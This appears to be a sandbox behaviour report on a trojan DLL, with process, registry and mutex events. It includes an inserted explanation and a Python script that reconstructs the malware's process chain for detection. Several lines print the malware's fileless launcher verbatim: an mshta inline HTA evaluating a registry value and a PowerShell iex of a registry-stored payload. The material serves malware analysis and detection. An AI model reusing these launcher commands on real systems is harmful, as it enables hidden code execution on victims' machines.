Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537F4BE 4_2_0537F4BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05381CD6 4_2_05381CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05362F9C 4_2_05362F9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05370F82 4_2_05370F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537DE9A 4_2_0537DE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053698A0 4_2_053698A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536D8E5 4_2_0536D8E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536B2A4 4_2_0536B2A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053852A0 4_2_053852A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536EAFA 4_2_0536EAFA
Source: C:\Windows\System32\control.exe Code function: 30_2_0025D958 30_2_0025D958
Source: C:\Windows\System32\control.exe Code function: 30_2_0026832C 30_2_0026832C
Source: C:\Windows\System32\control.exe Code function: 30_2_00245814 30_2_00245814
Source: C:\Windows\System32\control.exe Code function: 30_2_00263858 30_2_00263858
Source: C:\Windows\System32\control.exe Code function: 30_2_00245080 30_2_00245080
Source: C:\Windows\System32\control.exe Code function: 30_2_002490FC 30_2_002490FC
Source: C:\Windows\System32\control.exe Code function: 30_2_002430FC 30_2_002430FC
Source: C:\Windows\System32\control.exe Code function: 30_2_0024A8C4 30_2_0024A8C4
Source: C:\Windows\System32\control.exe Code function: 30_2_002558DC 30_2_002558DC
Source: C:\Windows\System32\control.exe Code function: 30_2_00265110 30_2_00265110
Source: C:\Windows\System32\control.exe Code function: 30_2_002569AC 30_2_002569AC
Source: C:\Windows\System32\control.exe Code function: 30_2_00266A38 30_2_00266A38
Source: C:\Windows\System32\control.exe Code function: 30_2_00255210 30_2_00255210
Source: C:\Windows\System32\control.exe Code function: 30_2_00266268 30_2_00266268
Source: C:\Windows\System32\control.exe Code function: 30_2_0024624C 30_2_0024624C
Source: C:\Windows\System32\control.exe Code function: 30_2_00248254 30_2_00248254
Source: C:\Windows\System32\control.exe Code function: 30_2_0025625C 30_2_0025625C
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A280 30_2_0026A280
Source: C:\Windows\System32\control.exe Code function: 30_2_0026CAF4 30_2_0026CAF4
Source: C:\Windows\System32\control.exe Code function: 30_2_00243B24 30_2_00243B24
Source: C:\Windows\System32\control.exe Code function: 30_2_0026BB54 30_2_0026BB54
Source: C:\Windows\System32\control.exe Code function: 30_2_0024C3B4 30_2_0024C3B4
Source: C:\Windows\System32\control.exe Code function: 30_2_00263B8E 30_2_00263B8E
Source: C:\Windows\System32\control.exe Code function: 30_2_0024BB94 30_2_0024BB94
Source: C:\Windows\System32\control.exe Code function: 30_2_00253BE0 30_2_00253BE0
Source: C:\Windows\System32\control.exe Code function: 30_2_00255C24 30_2_00255C24
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A470 30_2_0026A470
Source: C:\Windows\System32\control.exe Code function: 30_2_00241C78 30_2_00241C78
Source: C:\Windows\System32\control.exe Code function: 30_2_00249CD0 30_2_00249CD0
Source: C:\Windows\System32\control.exe Code function: 30_2_00267524 30_2_00267524
Source: C:\Windows\System32\control.exe Code function: 30_2_0024ED6C 30_2_0024ED6C
Source: C:\Windows\System32\control.exe Code function: 30_2_0025CD6C 30_2_0025CD6C
Source: C:\Windows\System32\control.exe Code function: 30_2_00260D44 30_2_00260D44
Source: C:\Windows\System32\control.exe Code function: 30_2_00247D48 30_2_00247D48
Source: C:\Windows\System32\control.exe Code function: 30_2_0025F598 30_2_0025F598
Source: C:\Windows\System32\control.exe Code function: 30_2_002425E8 30_2_002425E8
Source: C:\Windows\System32\control.exe Code function: 30_2_002575F8 30_2_002575F8
Source: C:\Windows\System32\control.exe Code function: 30_2_00266E34 30_2_00266E34
Source: C:\Windows\System32\control.exe Code function: 30_2_00265E3C 30_2_00265E3C
Source: C:\Windows\System32\control.exe Code function: 30_2_0024FEE4 30_2_0024FEE4
Source: C:\Windows\System32\control.exe Code function: 30_2_00250EF4 30_2_00250EF4
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A6C8 30_2_0026A6C8
Source: C:\Windows\System32\control.exe Code function: 30_2_0025AF34 30_2_0025AF34
Source: C:\Windows\System32\control.exe Code function: 30_2_00257F68 30_2_00257F68
Source: C:\Windows\System32\control.exe Code function: 30_2_0025EF74 30_2_0025EF74
Source: C:\Windows\System32\control.exe Code function: 30_2_00244744 30_2_00244744
PE file does not import any functions
Source: fedhsvoj.dll.29.dr Static PE information: No import functions for PE file found
Source: jqkof1ka.dll.32.dr Static PE information: No import functions for PE file found
Source: vbpfsg54.dll.36.dr Static PE information: No import functions for PE file found
Source: senxb4p4.dll.23.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: worVoBJYGD.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.troj.evad.winDLL@41/36@9/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0313D325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210803
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6256731B-5962-E467-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{767DCAC1-5D56-1864-970A-E1CCBBDEA5C0}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{0A0A9822-E171-CC61-BBDE-A5C01FF2A9F4}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{DA77943D-71E5-1CA0-CBAE-35102FC23944}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w25flno.lby.ps1
Source: worVoBJYGD.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
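Read together, these lines show the resident stage being relaunched without a file of its own. mshta.exe is started with an inline `about:<hta:application>` document whose script shrinks the window (resizeTo(0,2)), reads HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\DeviceFile through wscript.shell regread and evals it; that script spawns powershell.exe, which iex's the ASCII-decoded UtilTool value from the same key; the PowerShell stage then compiles C# through csc.exe from response files in %TEMP% (the four import-less DLLs listed under "PE file does not import any functions"), and csc.exe in turn runs cvtres.exe. The registry key is therefore the on-host artefact to hunt for (the report shows loaddll32.exe and rundll32.exe writing string and binary values through WMI StdRegProv, though not which key), and mshta -> powershell -> csc is the process-tree signal. The following Python script is an added example, not part of the report: it parses process-creation lines in the format used on this page (the input is copied from the lines above and constructed for the example), reconstructs each process's lineage, and extracts the registry key and value name each stage reads its next stage from. The detection rules and the function names are the author's own.

```python
"""Reconstruct the process chain and the registry-resident stages from
'Process created' lines in this report's format.

Added example, not part of the report. The input below is copied from the
report; the classification rules and all function names are the author's own.
"""
import ntpath
import re

# Constructed input: process-creation lines copied verbatim from this report.
PROCESS_LINES = r"""
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
"""

LINE_RE = re.compile(r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.*)$")
# Patterns for the registry reads embedded in the command lines (author's assumption).
HTA_REGREAD_RE = re.compile(r"regread\('([^']+)'\)", re.IGNORECASE)
PS_GETPROP_RE = re.compile(r"\bgp\s+'([^']+)'\s*\)\.(\w+)", re.IGNORECASE)
CSC_RESPONSE_RE = re.compile(r"@'([^']+\.cmdline)'", re.IGNORECASE)


def parse(text):
    """One dict per 'Process created' line: parent, image, cmdline."""
    return [m.groupdict() for m in map(LINE_RE.match, text.strip().splitlines()) if m]


def normalize_key(path):
    """Turn the PowerShell drive form and the HTA's escaped backslashes into one
    canonical HKCU key path so both stages can be compared."""
    if path.upper().startswith("HKCU:"):
        path = path.replace(":", "\\", 1)
    return re.sub(r"\\+", r"\\", path)  # collapse runs of backslashes


def lineage(events, image_path):
    """Root-first chain of image basenames ending at image_path."""
    parent_of = {e["image"].lower(): e["parent"].lower() for e in events}
    chain, cur = [], image_path.lower()
    while cur in parent_of:  # stops at 'unknown' (no creating process recorded)
        chain.append(ntpath.basename(cur))
        cur = parent_of[cur]
    return chain[::-1]


def classify(event):
    """(rule, target, value) for a fileless stage, or None."""
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    if image == "mshta.exe" and "<hta:application>" in cmd.lower():
        # Inline HTA: the script body is the command line itself, nothing touches disk.
        m = HTA_REGREAD_RE.search(cmd)
        if m:
            key, _, value = normalize_key(m.group(1)).rpartition("\\")
            return ("mshta inline HTA eval of a registry value", key, value)
        return ("mshta inline HTA", None, None)
    if image == "powershell.exe" and re.search(r"\biex\b", cmd, re.IGNORECASE):
        m = PS_GETPROP_RE.search(cmd)
        if m:
            return ("powershell iex of a registry value", normalize_key(m.group(1)), m.group(2))
        return ("powershell iex", None, None)
    if image == "csc.exe":
        m = CSC_RESPONSE_RE.search(cmd)
        if m and "\\temp\\" in m.group(1).lower():
            return ("csc.exe compiling from a response file in Temp", m.group(1), None)
    return None


def triage(text):
    """Findings with the full parent chain for every stage that matched."""
    events = parse(text)
    findings = []
    for e in events:
        hit = classify(e)
        if hit:
            rule, target, value = hit
            findings.append({"chain": " -> ".join(lineage(events, e["image"])),
                             "rule": rule, "target": target, "value": value})
    return findings


def staged_registry_values(findings):
    """(key, value name) pairs the chain reads its next stage from."""
    return {(f["target"], f["value"]) for f in findings if f["value"]}


if __name__ == "__main__":
    for f in triage(PROCESS_LINES):
        print(f"{f['chain']}: {f['rule']} [{f['target']} / {f['value']}]")
```

The lineage walk stops at "unknown", which is how the report records mshta.exe being started by something the sandbox did not attribute; in live telemetry the creating process would be the injected control.exe or rundll32.exe, and the same walk would join the two halves of the chain.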
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: worVoBJYGD.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.429129001.000001ED7C9D0000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.443954090.000002400C710000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.449751054.000001317AE50000.00000002.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.pdb source: powershell.exe, 00000013.00000002.561042649.0000020484316000.00000004.00000001.sdmp
